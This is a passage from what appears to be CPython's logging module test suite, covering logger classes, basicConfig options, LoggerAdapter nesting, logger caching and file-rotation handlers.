    def test_warning(self):
        self._test_log('warning')
    def test_error(self):
        self._test_log('error')
    def test_critical(self):
        self._test_log('critical')
    def test_set_logger_class(self):
        # setLoggerClass rejects classes that are not Logger subclasses.
        self.assertRaises(TypeError, logging.setLoggerClass, object)
        class MyLogger(logging.Logger):
            pass
        logging.setLoggerClass(MyLogger)
        self.assertEqual(logging.getLoggerClass(), MyLogger)
        logging.setLoggerClass(logging.Logger)
        self.assertEqual(logging.getLoggerClass(), logging.Logger)
    def test_subclass_logger_cache(self):
        # bpo-37258
        message = []
        class MyLogger(logging.getLoggerClass()):
            def __init__(self, name='MyLogger', level=logging.NOTSET):
                super().__init__(name, level)
                message.append('initialized')
        logging.setLoggerClass(MyLogger)
        logger = logging.getLogger('just_some_logger')
        # getLogger must construct the installed subclass exactly once.
        self.assertEqual(message, ['initialized'])
        stream = io.StringIO()
        h = logging.StreamHandler(stream)
        logger.addHandler(h)
        try:
            logger.setLevel(logging.DEBUG)
            logger.debug("hello")
            self.assertEqual(stream.getvalue().strip(), "hello")
            stream.truncate(0)
            stream.seek(0)
            logger.setLevel(logging.INFO)
            logger.debug("hello")
            self.assertEqual(stream.getvalue(), "")
        finally:
            logger.removeHandler(h)
            h.close()
            logging.setLoggerClass(logging.Logger)
    @support.requires_type_collecting
    def test_logging_at_shutdown(self):
        # Issue #20037
        code = """if 1:
            import logging
            class A:
                def __del__(self):
                    try:
                        raise ValueError("some error")
                    except Exception:
                        logging.exception("exception in __del__")
            a = A()"""
        rc, out, err = assert_python_ok("-c", code)
        err = err.decode()
        self.assertIn("exception in __del__", err)
        self.assertIn("ValueError: some error", err)
    def test_recursion_error(self):
        # Issue 36272
        code = """if 1:
            import logging
            def rec():
                logging.error("foo")
                rec()
            rec()"""
        rc, out, err = assert_python_failure("-c", code)
        err = err.decode()
        self.assertNotIn("Cannot recover from stack overflow.", err)
        self.assertEqual(rc, 1)
class LogRecordTest(BaseTest):
    """Behavioural tests for LogRecord creation and optional attributes."""

    def test_str_rep(self):
        record = logging.makeLogRecord({})
        text = str(record)
        self.assertTrue(text.startswith('<LogRecord: '))
        self.assertTrue(text.endswith('>'))

    def test_dict_arg(self):
        handler = RecordingHandler()
        root = logging.getLogger()
        root.addHandler(handler)
        mapping = {'less' : 'more' }
        # A single dict argument is kept as-is and used for %-substitution.
        logging.warning('less is %(less)s', mapping)
        self.assertIs(handler.records[0].args, mapping)
        self.assertEqual(handler.records[0].message, 'less is more')
        root.removeHandler(handler)
        handler.close()

    def test_multiprocessing(self):
        record = logging.makeLogRecord({})
        self.assertEqual(record.processName, 'MainProcess')
        try:
            import multiprocessing as mp
        except ImportError:
            pass
        else:
            record = logging.makeLogRecord({})
            self.assertEqual(record.processName, mp.current_process().name)

    def test_optional(self):
        optional_attrs = ('thread', 'threadName', 'process', 'processName')
        record = logging.makeLogRecord({})
        for attr in optional_attrs:
            self.assertIsNotNone(getattr(record, attr))
        saved = (logging.logThreads, logging.logProcesses,
                 logging.logMultiprocessing)
        try:
            # With the collection flags off, the attributes come back None.
            logging.logThreads = False
            logging.logProcesses = False
            logging.logMultiprocessing = False
            record = logging.makeLogRecord({})
            for attr in optional_attrs:
                self.assertIsNone(getattr(record, attr))
        finally:
            (logging.logThreads, logging.logProcesses,
             logging.logMultiprocessing) = saved
class BasicConfigTest(unittest.TestCase):
    """Test suite for logging.basicConfig."""
    def setUp(self):
        super(BasicConfigTest, self).setUp()
        # Snapshot global logging state so each test starts with an empty
        # root handler list and cleanup() can restore everything.
        self.handlers = logging.root.handlers
        self.saved_handlers = logging._handlers.copy()
        self.saved_handler_list = logging._handlerList[:]
        self.original_logging_level = logging.root.level
        self.addCleanup(self.cleanup)
        logging.root.handlers = []
    def tearDown(self):
        for h in logging.root.handlers[:]:
            logging.root.removeHandler(h)
            h.close()
        super(BasicConfigTest, self).tearDown()
    def cleanup(self):
        # Restore the state snapshotted in setUp().
        setattr(logging.root, 'handlers', self.handlers)
        logging._handlers.clear()
        logging._handlers.update(self.saved_handlers)
        logging._handlerList[:] = self.saved_handler_list
        logging.root.setLevel(self.original_logging_level)
    def test_no_kwargs(self):
        logging.basicConfig()
        # handler defaults to a StreamHandler to sys.stderr
        self.assertEqual(len(logging.root.handlers), 1)
        handler = logging.root.handlers[0]
        self.assertIsInstance(handler, logging.StreamHandler)
        self.assertEqual(handler.stream, sys.stderr)
        formatter = handler.formatter
        # format defaults to logging.BASIC_FORMAT
        self.assertEqual(formatter._style._fmt, logging.BASIC_FORMAT)
        # datefmt defaults to None
        self.assertIsNone(formatter.datefmt)
        # style defaults to %
        self.assertIsInstance(formatter._style, logging.PercentStyle)
        # level is not explicitly set
        self.assertEqual(logging.root.level, self.original_logging_level)
    def test_strformatstyle(self):
        with support.captured_stdout() as output:
            logging.basicConfig(stream=sys.stdout, style="{")
            logging.error("Log an error")
            sys.stdout.seek(0)
            self.assertEqual(output.getvalue().strip(),
                "ERROR:root:Log an error")
    def test_stringtemplatestyle(self):
        with support.captured_stdout() as output:
            logging.basicConfig(stream=sys.stdout, style="$")
            logging.error("Log an error")
            sys.stdout.seek(0)
            self.assertEqual(output.getvalue().strip(),
                "ERROR:root:Log an error")
    def test_filename(self):
        def cleanup(h1, h2, fn):
            h1.close()
            h2.close()
            os.remove(fn)
        logging.basicConfig(filename='test.log')
        self.assertEqual(len(logging.root.handlers), 1)
        handler = logging.root.handlers[0]
        self.assertIsInstance(handler, logging.FileHandler)
        # Compare against a reference handler opened with the default mode.
        expected = logging.FileHandler('test.log', 'a')
        self.assertEqual(handler.stream.mode, expected.stream.mode)
        self.assertEqual(handler.stream.name, expected.stream.name)
        self.addCleanup(cleanup, handler, expected, 'test.log')
    def test_filemode(self):
        def cleanup(h1, h2, fn):
            h1.close()
            h2.close()
            os.remove(fn)
        logging.basicConfig(filename='test.log', filemode='wb')
        handler = logging.root.handlers[0]
        expected = logging.FileHandler('test.log', 'wb')
        self.assertEqual(handler.stream.mode, expected.stream.mode)
        self.addCleanup(cleanup, handler, expected, 'test.log')
    def test_stream(self):
        stream = io.StringIO()
        self.addCleanup(stream.close)
        logging.basicConfig(stream=stream)
        self.assertEqual(len(logging.root.handlers), 1)
        handler = logging.root.handlers[0]
        self.assertIsInstance(handler, logging.StreamHandler)
        self.assertEqual(handler.stream, stream)
    def test_format(self):
        logging.basicConfig(format='%(asctime)s - %(message)s')
        formatter = logging.root.handlers[0].formatter
        self.assertEqual(formatter._style._fmt, '%(asctime)s - %(message)s')
    def test_datefmt(self):
        logging.basicConfig(datefmt='bar')
        formatter = logging.root.handlers[0].formatter
        self.assertEqual(formatter.datefmt, 'bar')
    def test_style(self):
        logging.basicConfig(style='$')
        formatter = logging.root.handlers[0].formatter
        self.assertIsInstance(formatter._style, logging.StringTemplateStyle)
    def test_level(self):
        old_level = logging.root.level
        self.addCleanup(logging.root.setLevel, old_level)
        logging.basicConfig(level=57)
        self.assertEqual(logging.root.level, 57)
        # Test that second call has no effect
        logging.basicConfig(level=58)
        self.assertEqual(logging.root.level, 57)
    def test_incompatible(self):
        # Mutually exclusive keyword combinations must be rejected.
        assertRaises = self.assertRaises
        handlers = [logging.StreamHandler()]
        stream = sys.stderr
        assertRaises(ValueError, logging.basicConfig, filename='test.log',
                     stream=stream)
        assertRaises(ValueError, logging.basicConfig, filename='test.log',
                     handlers=handlers)
        assertRaises(ValueError, logging.basicConfig, stream=stream,
                     handlers=handlers)
        # Issue 23207: test for invalid kwargs
        assertRaises(ValueError, logging.basicConfig, loglevel=logging.INFO)
        # Should pop both filename and filemode even if filename is None
        logging.basicConfig(filename=None, filemode='a')
    def test_handlers(self):
        handlers = [
            logging.StreamHandler(),
            logging.StreamHandler(sys.stdout),
            logging.StreamHandler(),
        ]
        f = logging.Formatter()
        handlers[2].setFormatter(f)
        logging.basicConfig(handlers=handlers)
        self.assertIs(handlers[0], logging.root.handlers[0])
        self.assertIs(handlers[1], logging.root.handlers[1])
        self.assertIs(handlers[2], logging.root.handlers[2])
        # Handlers without a formatter get a shared default one; an
        # explicitly set formatter is left untouched.
        self.assertIsNotNone(handlers[0].formatter)
        self.assertIsNotNone(handlers[1].formatter)
        self.assertIs(handlers[2].formatter, f)
        self.assertIs(handlers[0].formatter, handlers[1].formatter)
    def test_force(self):
        # force=True makes a second basicConfig call replace the existing
        # handlers instead of being a no-op.
        old_string_io = io.StringIO()
        new_string_io = io.StringIO()
        old_handlers = [logging.StreamHandler(old_string_io)]
        new_handlers = [logging.StreamHandler(new_string_io)]
        logging.basicConfig(level=logging.WARNING, handlers=old_handlers)
        logging.warning('warn')
        logging.info('info')
        logging.debug('debug')
        self.assertEqual(len(logging.root.handlers), 1)
        logging.basicConfig(level=logging.INFO, handlers=new_handlers,
                            force=True)
        logging.warning('warn')
        logging.info('info')
        logging.debug('debug')
        self.assertEqual(len(logging.root.handlers), 1)
        self.assertEqual(old_string_io.getvalue().strip(),
                         'WARNING:root:warn')
        self.assertEqual(new_string_io.getvalue().strip(),
                         'WARNING:root:warn\nINFO:root:info')
    def test_encoding(self):
        # NOTE(review): if basicConfig() itself raised, 'handler' would be
        # unbound in the finally block and mask the original error.
        try:
            encoding = 'utf-8'
            logging.basicConfig(filename='test.log', encoding=encoding,
                                errors='strict',
                                format='%(message)s', level=logging.DEBUG)
            self.assertEqual(len(logging.root.handlers), 1)
            handler = logging.root.handlers[0]
            self.assertIsInstance(handler, logging.FileHandler)
            self.assertEqual(handler.encoding, encoding)
            logging.debug('The Øresund Bridge joins Copenhagen to Malmö')
        finally:
            handler.close()
            with open('test.log', encoding='utf-8') as f:
                data = f.read().strip()
            os.remove('test.log')
        self.assertEqual(data,
                         'The Øresund Bridge joins Copenhagen to Malmö')
    def test_encoding_errors(self):
        try:
            encoding = 'ascii'
            logging.basicConfig(filename='test.log', encoding=encoding,
                                errors='ignore',
                                format='%(message)s', level=logging.DEBUG)
            self.assertEqual(len(logging.root.handlers), 1)
            handler = logging.root.handlers[0]
            self.assertIsInstance(handler, logging.FileHandler)
            self.assertEqual(handler.encoding, encoding)
            logging.debug('The Øresund Bridge joins Copenhagen to Malmö')
        finally:
            handler.close()
            with open('test.log', encoding='utf-8') as f:
                data = f.read().strip()
            os.remove('test.log')
        # errors='ignore' silently drops the non-ASCII characters.
        self.assertEqual(data, 'The resund Bridge joins Copenhagen to Malm')
    def test_encoding_errors_default(self):
        try:
            encoding = 'ascii'
            logging.basicConfig(filename='test.log', encoding=encoding,
                                format='%(message)s', level=logging.DEBUG)
            self.assertEqual(len(logging.root.handlers), 1)
            handler = logging.root.handlers[0]
            self.assertIsInstance(handler, logging.FileHandler)
            self.assertEqual(handler.encoding, encoding)
            self.assertEqual(handler.errors, 'backslashreplace')
            logging.debug('😂: ☃️: The Øresund Bridge joins Copenhagen to Malmö')
        finally:
            handler.close()
            with open('test.log', encoding='utf-8') as f:
                data = f.read().strip()
            os.remove('test.log')
        # The default 'backslashreplace' keeps escaped forms of the
        # unencodable characters.
        self.assertEqual(data, r'\U0001f602: \u2603\ufe0f: The \xd8resund '
                               r'Bridge joins Copenhagen to Malm\xf6')
    def test_encoding_errors_none(self):
        # Specifying None should behave as 'strict'
        try:
            encoding = 'ascii'
            logging.basicConfig(filename='test.log', encoding=encoding,
                                errors=None,
                                format='%(message)s', level=logging.DEBUG)
            self.assertEqual(len(logging.root.handlers), 1)
            handler = logging.root.handlers[0]
            self.assertIsInstance(handler, logging.FileHandler)
            self.assertEqual(handler.encoding, encoding)
            self.assertIsNone(handler.errors)
            message = []
            def dummy_handle_error(record):
                _, v, _ = sys.exc_info()
                message.append(str(v))
            # Capture the UnicodeEncodeError the handler reports internally.
            handler.handleError = dummy_handle_error
            logging.debug('The Øresund Bridge joins Copenhagen to Malmö')
            self.assertTrue(message)
            self.assertIn("'ascii' codec can't encode "
                          "character '\\xd8' in position 4:", message[0])
        finally:
            handler.close()
            with open('test.log', encoding='utf-8') as f:
                data = f.read().strip()
            os.remove('test.log')
        # didn't write anything due to the encoding error
        self.assertEqual(data, r'')
    def _test_log(self, method, level=None):
        # logging.root has no handlers so basicConfig should be called
        called = []
        old_basic_config = logging.basicConfig
        def my_basic_config(*a, **kw):
            old_basic_config()
            old_level = logging.root.level
            logging.root.setLevel(100) # avoid having messages in stderr
            self.addCleanup(logging.root.setLevel, old_level)
            called.append((a, kw))
        support.patch(self, logging, 'basicConfig', my_basic_config)
        log_method = getattr(logging, method)
        if level is not None:
            log_method(level, "test me")
        else:
            log_method("test me")
        # basicConfig was called with no arguments
        self.assertEqual(called, [((), {})])
    def test_log(self):
        self._test_log('log', logging.WARNING)
    def test_debug(self):
        self._test_log('debug')
    def test_info(self):
        self._test_log('info')
    def test_warning(self):
        self._test_log('warning')
    def test_error(self):
        self._test_log('error')
    def test_critical(self):
        self._test_log('critical')
class LoggerAdapterTest(unittest.TestCase):
    """Tests for logging.LoggerAdapter: delegation to the wrapped logger,
    record contents, and nesting of adapters."""
    def setUp(self):
        super(LoggerAdapterTest, self).setUp()
        # Snapshot the global handler list so cleanup() can restore it.
        old_handler_list = logging._handlerList[:]
        self.recording = RecordingHandler()
        self.logger = logging.root
        self.logger.addHandler(self.recording)
        self.addCleanup(self.logger.removeHandler, self.recording)
        self.addCleanup(self.recording.close)
        def cleanup():
            logging._handlerList[:] = old_handler_list
        self.addCleanup(cleanup)
        self.addCleanup(logging.shutdown)
        self.adapter = logging.LoggerAdapter(logger=self.logger, extra=None)
    def test_exception(self):
        # exception() logs at ERROR and attaches the active exc_info.
        msg = 'testing exception: %r'
        exc = None
        try:
            1 / 0
        except ZeroDivisionError as e:
            exc = e
            self.adapter.exception(msg, self.recording)
        self.assertEqual(len(self.recording.records), 1)
        record = self.recording.records[0]
        self.assertEqual(record.levelno, logging.ERROR)
        self.assertEqual(record.msg, msg)
        self.assertEqual(record.args, (self.recording,))
        self.assertEqual(record.exc_info,
                         (exc.__class__, exc, exc.__traceback__))
    def test_exception_excinfo(self):
        # An exception instance passed as exc_info= is expanded to a triple.
        try:
            1 / 0
        except ZeroDivisionError as e:
            exc = e
            self.adapter.exception('exc_info test', exc_info=exc)
        self.assertEqual(len(self.recording.records), 1)
        record = self.recording.records[0]
        self.assertEqual(record.exc_info,
                         (exc.__class__, exc, exc.__traceback__))
    def test_critical(self):
        msg = 'critical test! %r'
        self.adapter.critical(msg, self.recording)
        self.assertEqual(len(self.recording.records), 1)
        record = self.recording.records[0]
        self.assertEqual(record.levelno, logging.CRITICAL)
        self.assertEqual(record.msg, msg)
        self.assertEqual(record.args, (self.recording,))
    def test_is_enabled_for(self):
        old_disable = self.adapter.logger.manager.disable
        self.adapter.logger.manager.disable = 33
        self.addCleanup(setattr, self.adapter.logger.manager, 'disable',
                        old_disable)
        self.assertFalse(self.adapter.isEnabledFor(32))
    def test_has_handlers(self):
        self.assertTrue(self.adapter.hasHandlers())
        # NOTE(review): this removes handlers while iterating the same
        # list — works only if removal semantics tolerate it; consider
        # iterating a copy.
        for handler in self.logger.handlers:
            self.logger.removeHandler(handler)
        self.assertFalse(self.logger.hasHandlers())
        self.assertFalse(self.adapter.hasHandlers())
    def test_nested(self):
        class Adapter(logging.LoggerAdapter):
            prefix = 'Adapter'
            def process(self, msg, kwargs):
                return f"{self.prefix} {msg}", kwargs
        msg = 'Adapters can be nested, yo.'
        adapter = Adapter(logger=self.logger, extra=None)
        adapter_adapter = Adapter(logger=adapter, extra=None)
        adapter_adapter.prefix = 'AdapterAdapter'
        self.assertEqual(repr(adapter), repr(adapter_adapter))
        adapter_adapter.log(logging.CRITICAL, msg, self.recording)
        self.assertEqual(len(self.recording.records), 1)
        record = self.recording.records[0]
        self.assertEqual(record.levelno, logging.CRITICAL)
        # Both adapters' process() hooks prepend their prefix in turn.
        self.assertEqual(record.msg, f"Adapter AdapterAdapter {msg}")
        self.assertEqual(record.args, (self.recording,))
        orig_manager = adapter_adapter.manager
        self.assertIs(adapter.manager, orig_manager)
        self.assertIs(self.logger.manager, orig_manager)
        # The manager attribute is delegated through the adapter chain to
        # the underlying logger, for reads and writes alike.
        temp_manager = object()
        try:
            adapter_adapter.manager = temp_manager
            self.assertIs(adapter_adapter.manager, temp_manager)
            self.assertIs(adapter.manager, temp_manager)
            self.assertIs(self.logger.manager, temp_manager)
        finally:
            adapter_adapter.manager = orig_manager
            self.assertIs(adapter_adapter.manager, orig_manager)
            self.assertIs(adapter.manager, orig_manager)
            self.assertIs(self.logger.manager, orig_manager)
class LoggerTest(BaseTest):
    """Tests for logging.Logger itself: level validation, record creation,
    caller lookup, handler queries, and the isEnabledFor() cache."""

    def setUp(self):
        super(LoggerTest, self).setUp()
        # RecordingHandler captures emitted LogRecords for inspection.
        self.recording = RecordingHandler()
        self.logger = logging.Logger(name='blah')
        self.logger.addHandler(self.recording)
        self.addCleanup(self.logger.removeHandler, self.recording)
        self.addCleanup(self.recording.close)
        self.addCleanup(logging.shutdown)

    def test_set_invalid_level(self):
        # setLevel() accepts only ints or registered level names.
        self.assertRaises(TypeError, self.logger.setLevel, object())

    def test_exception(self):
        # logger.exception() must log at ERROR and attach the active exc_info.
        msg = 'testing exception: %r'
        exc = None
        try:
            1 / 0
        except ZeroDivisionError as e:
            exc = e
            self.logger.exception(msg, self.recording)
        self.assertEqual(len(self.recording.records), 1)
        record = self.recording.records[0]
        self.assertEqual(record.levelno, logging.ERROR)
        self.assertEqual(record.msg, msg)
        self.assertEqual(record.args, (self.recording,))
        self.assertEqual(record.exc_info,
                         (exc.__class__, exc, exc.__traceback__))

    def test_log_invalid_level_with_raise(self):
        # With raiseExceptions on, a non-int level is a TypeError.
        with support.swap_attr(logging, 'raiseExceptions', True):
            self.assertRaises(TypeError, self.logger.log, '10', 'test message')

    def test_log_invalid_level_no_raise(self):
        # With raiseExceptions off, the bad level is silently ignored.
        with support.swap_attr(logging, 'raiseExceptions', False):
            self.logger.log('10', 'test message')  # no exception happens

    def test_find_caller_with_stack_info(self):
        # Patch traceback.print_stack to capture what findCaller renders.
        called = []
        support.patch(self, logging.traceback, 'print_stack',
                      lambda f, file: called.append(file.getvalue()))
        self.logger.findCaller(stack_info=True)
        self.assertEqual(len(called), 1)
        self.assertEqual('Stack (most recent call last):\n', called[0])

    def test_find_caller_with_stacklevel(self):
        # Each +1 on the_level should attribute the record one frame higher
        # in the innermost -> inner -> outer -> test call chain.
        the_level = 1

        def innermost():
            self.logger.warning('test', stacklevel=the_level)

        def inner():
            innermost()

        def outer():
            inner()

        records = self.recording.records
        outer()
        self.assertEqual(records[-1].funcName, 'innermost')
        lineno = records[-1].lineno
        the_level += 1
        outer()
        self.assertEqual(records[-1].funcName, 'inner')
        self.assertGreater(records[-1].lineno, lineno)
        lineno = records[-1].lineno
        the_level += 1
        outer()
        self.assertEqual(records[-1].funcName, 'outer')
        self.assertGreater(records[-1].lineno, lineno)
        lineno = records[-1].lineno
        the_level += 1
        outer()
        self.assertEqual(records[-1].funcName, 'test_find_caller_with_stacklevel')
        self.assertGreater(records[-1].lineno, lineno)

    def test_make_record_with_extra_overwrite(self):
        # extra keys may not shadow reserved LogRecord attributes.
        name = 'my record'
        level = 13
        fn = lno = msg = args = exc_info = func = sinfo = None
        rv = logging._logRecordFactory(name, level, fn, lno, msg, args,
                                       exc_info, func, sinfo)
        for key in ('message', 'asctime') + tuple(rv.__dict__.keys()):
            extra = {key: 'some value'}
            self.assertRaises(KeyError, self.logger.makeRecord, name, level,
                              fn, lno, msg, args, exc_info,
                              extra=extra, sinfo=sinfo)

    def test_make_record_with_extra_no_overwrite(self):
        # Non-conflicting extra keys land on the record's __dict__.
        name = 'my record'
        level = 13
        fn = lno = msg = args = exc_info = func = sinfo = None
        extra = {'valid_key': 'some value'}
        result = self.logger.makeRecord(name, level, fn, lno, msg, args,
                                        exc_info, extra=extra, sinfo=sinfo)
        self.assertIn('valid_key', result.__dict__)

    def test_has_handlers(self):
        self.assertTrue(self.logger.hasHandlers())
        for handler in self.logger.handlers:
            self.logger.removeHandler(handler)
        self.assertFalse(self.logger.hasHandlers())

    def test_has_handlers_no_propagate(self):
        # With propagate off, the parent's handlers must not be counted.
        child_logger = logging.getLogger('blah.child')
        child_logger.propagate = False
        self.assertFalse(child_logger.hasHandlers())

    def test_is_enabled_for(self):
        # manager.disable above the queried level disables the logger.
        old_disable = self.logger.manager.disable
        self.logger.manager.disable = 23
        self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
        self.assertFalse(self.logger.isEnabledFor(22))

    def test_is_enabled_for_disabled_logger(self):
        old_disabled = self.logger.disabled
        old_disable = self.logger.manager.disable
        self.logger.disabled = True
        self.logger.manager.disable = 21
        self.addCleanup(setattr, self.logger, 'disabled', old_disabled)
        self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
        self.assertFalse(self.logger.isEnabledFor(22))

    def test_root_logger_aliases(self):
        # '', 'root' and None all resolve to the singleton root logger.
        root = logging.getLogger()
        self.assertIs(root, logging.root)
        self.assertIs(root, logging.getLogger(None))
        self.assertIs(root, logging.getLogger(''))
        self.assertIs(root, logging.getLogger('root'))
        self.assertIs(root, logging.getLogger('foo').root)
        self.assertIs(root, logging.getLogger('foo.bar').root)
        self.assertIs(root, logging.getLogger('foo').parent)
        self.assertIsNot(root, logging.getLogger('\0'))
        self.assertIsNot(root, logging.getLogger('foo.bar').parent)

    def test_invalid_names(self):
        # Logger names must be str (not arbitrary objects or bytes).
        self.assertRaises(TypeError, logging.getLogger, any)
        self.assertRaises(TypeError, logging.getLogger, b'foo')

    def test_pickling(self):
        # Unpickling a logger must return the same registered instance.
        for proto in range(pickle.HIGHEST_PROTOCOL + 1):
            for name in ('', 'root', 'foo', 'foo.bar', 'baz.bar'):
                logger = logging.getLogger(name)
                s = pickle.dumps(logger, proto)
                unpickled = pickle.loads(s)
                self.assertIs(unpickled, logger)

    def test_caching(self):
        # Exercises the private _cache used by isEnabledFor(): populated
        # lazily, and invalidated by setLevel()/disable().
        root = self.root_logger
        logger1 = logging.getLogger("abc")
        logger2 = logging.getLogger("abc.def")
        # Set root logger level and ensure cache is empty
        root.setLevel(logging.ERROR)
        self.assertEqual(logger2.getEffectiveLevel(), logging.ERROR)
        self.assertEqual(logger2._cache, {})
        # Ensure cache is populated and calls are consistent
        self.assertTrue(logger2.isEnabledFor(logging.ERROR))
        self.assertFalse(logger2.isEnabledFor(logging.DEBUG))
        self.assertEqual(logger2._cache, {logging.ERROR: True, logging.DEBUG: False})
        self.assertEqual(root._cache, {})
        self.assertTrue(logger2.isEnabledFor(logging.ERROR))
        # Ensure root cache gets populated
        self.assertEqual(root._cache, {})
        self.assertTrue(root.isEnabledFor(logging.ERROR))
        self.assertEqual(root._cache, {logging.ERROR: True})
        # Set parent logger level and ensure caches are emptied
        logger1.setLevel(logging.CRITICAL)
        self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
        self.assertEqual(logger2._cache, {})
        # Ensure logger2 uses parent logger's effective level
        self.assertFalse(logger2.isEnabledFor(logging.ERROR))
        # Set level to NOTSET and ensure caches are empty
        logger2.setLevel(logging.NOTSET)
        self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
        self.assertEqual(logger2._cache, {})
        self.assertEqual(logger1._cache, {})
        self.assertEqual(root._cache, {})
        # Verify logger2 follows parent and not root
        self.assertFalse(logger2.isEnabledFor(logging.ERROR))
        self.assertTrue(logger2.isEnabledFor(logging.CRITICAL))
        self.assertFalse(logger1.isEnabledFor(logging.ERROR))
        self.assertTrue(logger1.isEnabledFor(logging.CRITICAL))
        self.assertTrue(root.isEnabledFor(logging.ERROR))
        # Disable logging in manager and ensure caches are clear
        logging.disable()
        self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
        self.assertEqual(logger2._cache, {})
        self.assertEqual(logger1._cache, {})
        self.assertEqual(root._cache, {})
        # Ensure no loggers are enabled
        self.assertFalse(logger1.isEnabledFor(logging.CRITICAL))
        self.assertFalse(logger2.isEnabledFor(logging.CRITICAL))
        self.assertFalse(root.isEnabledFor(logging.CRITICAL))
class BaseFileTest(BaseTest):
    "Base class for handler tests that write log files"

    def setUp(self):
        BaseTest.setUp(self)
        # Create (and immediately close) a temp file path for the handler.
        fd, self.fn = tempfile.mkstemp(".log", "test_logging-2-")
        os.close(fd)
        # Extra files registered via assertLogFile(), removed in tearDown.
        self.rmfiles = []

    def tearDown(self):
        for fn in self.rmfiles:
            os.unlink(fn)
        if os.path.exists(self.fn):
            os.unlink(self.fn)
        BaseTest.tearDown(self)

    def assertLogFile(self, filename):
        "Assert a log file is there and register it for deletion"
        self.assertTrue(os.path.exists(filename),
                        msg="Log file %r does not exist" % filename)
        self.rmfiles.append(filename)
class FileHandlerTest(BaseFileTest):
    def test_delay(self):
        # With delay=True the stream/file must not be opened until the first
        # record is handled.
        os.unlink(self.fn)
        fh = logging.FileHandler(self.fn, delay=True)
        self.assertIsNone(fh.stream)
        self.assertFalse(os.path.exists(self.fn))
        fh.handle(logging.makeLogRecord({}))
        self.assertIsNotNone(fh.stream)
        self.assertTrue(os.path.exists(self.fn))
        fh.close()
class RotatingFileHandlerTest(BaseFileTest):
    """Size-based rollover behaviour, including custom namer/rotator hooks."""

    def next_rec(self):
        # Fresh DEBUG record with a unique message from BaseTest.next_message().
        return logging.LogRecord('n', logging.DEBUG, 'p', 1,
                                 self.next_message(), None, None, None)

    def test_should_not_rollover(self):
        # If maxbytes is zero rollover never occurs
        rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=0)
        self.assertFalse(rh.shouldRollover(None))
        rh.close()

    def test_should_rollover(self):
        rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=1)
        self.assertTrue(rh.shouldRollover(self.next_rec()))
        rh.close()

    def test_file_created(self):
        # checks that the file is created and assumes it was created
        # by us
        rh = logging.handlers.RotatingFileHandler(self.fn)
        rh.emit(self.next_rec())
        self.assertLogFile(self.fn)
        rh.close()

    def test_rollover_filenames(self):
        # A custom namer controls the backup file names (.1.test, .2.test).
        def namer(name):
            return name + ".test"
        rh = logging.handlers.RotatingFileHandler(
            self.fn, backupCount=2, maxBytes=1)
        rh.namer = namer
        rh.emit(self.next_rec())
        self.assertLogFile(self.fn)
        rh.emit(self.next_rec())
        self.assertLogFile(namer(self.fn + ".1"))
        rh.emit(self.next_rec())
        self.assertLogFile(namer(self.fn + ".2"))
        # backupCount=2 caps the number of backups: no .3 should appear.
        self.assertFalse(os.path.exists(namer(self.fn + ".3")))
        rh.close()

    def test_namer_rotator_inheritance(self):
        # namer/rotator may also be provided as methods on a subclass.
        class HandlerWithNamerAndRotator(logging.handlers.RotatingFileHandler):
            def namer(self, name):
                return name + ".test"

            def rotator(self, source, dest):
                if os.path.exists(source):
                    os.rename(source, dest + ".rotated")

        rh = HandlerWithNamerAndRotator(
            self.fn, backupCount=2, maxBytes=1)
        self.assertEqual(rh.namer(self.fn), self.fn + ".test")
        rh.emit(self.next_rec())
        self.assertLogFile(self.fn)
        rh.emit(self.next_rec())
        self.assertLogFile(rh.namer(self.fn + ".1") + ".rotated")
        self.assertFalse(os.path.exists(rh.namer(self.fn + ".1")))
        rh.close()

    @support.requires_zlib
    def test_rotator(self):
        # rotator compresses rotated files; backups cycle so that the oldest
        # message ends up in the highest-numbered backup.
        def namer(name):
            return name + ".gz"

        def rotator(source, dest):
            with open(source, "rb") as sf:
                data = sf.read()
                compressed = zlib.compress(data, 9)
                with open(dest, "wb") as df:
                    df.write(compressed)
            os.remove(source)

        rh = logging.handlers.RotatingFileHandler(
            self.fn, backupCount=2, maxBytes=1)
        rh.rotator = rotator
        rh.namer = namer
        m1 = self.next_rec()
        rh.emit(m1)
        self.assertLogFile(self.fn)
        m2 = self.next_rec()
        rh.emit(m2)
        fn = namer(self.fn + ".1")
        self.assertLogFile(fn)
        newline = os.linesep
        with open(fn, "rb") as f:
            compressed = f.read()
            data = zlib.decompress(compressed)
            self.assertEqual(data.decode("ascii"), m1.msg + newline)
        rh.emit(self.next_rec())
        fn = namer(self.fn + ".2")
        self.assertLogFile(fn)
        with open(fn, "rb") as f:
            compressed = f.read()
            data = zlib.decompress(compressed)
            self.assertEqual(data.decode("ascii"), m1.msg + newline)
        rh.emit(self.next_rec())
        fn = namer(self.fn + ".2")
        with open(fn, "rb") as f:
            compressed = f.read()
            data = zlib.decompress(compressed)
            self.assertEqual(data.decode("ascii"), m2.msg + newline)
        self.assertFalse(os.path.exists(namer(self.fn + ".3")))
        rh.close()
class TimedRotatingFileHandlerTest(BaseFileTest):
    # other test methods added below

    def test_rollover(self):
        # Emit, wait just over one second ('S' interval), emit again, then
        # hunt for the timestamped rotated file.
        fh = logging.handlers.TimedRotatingFileHandler(self.fn, 'S',
                                                       backupCount=1)
        fmt = logging.Formatter('%(asctime)s %(message)s')
        fh.setFormatter(fmt)
        r1 = logging.makeLogRecord({'msg': 'testing - initial'})
        fh.emit(r1)
        self.assertLogFile(self.fn)
        time.sleep(1.1)  # a little over a second ...
        r2 = logging.makeLogRecord({'msg': 'testing - after delay'})
        fh.emit(r2)
        fh.close()
        # At this point, we should have a recent rotated file which we
        # can test for the existence of. However, in practice, on some
        # machines which run really slowly, we don't know how far back
        # in time to go to look for the log file. So, we go back a fair
        # bit, and stop as soon as we see a rotated file. In theory this
        # could of course still fail, but the chances are lower.
        found = False
        now = datetime.datetime.now()
        GO_BACK = 5 * 60  # seconds
        for secs in range(GO_BACK):
            prev = now - datetime.timedelta(seconds=secs)
            fn = self.fn + prev.strftime(".%Y-%m-%d_%H-%M-%S")
            found = os.path.exists(fn)
            if found:
                self.rmfiles.append(fn)
                break
        msg = 'No rotated files found, went back %d seconds' % GO_BACK
        if not found:
            # print additional diagnostics
            dn, fn = os.path.split(self.fn)
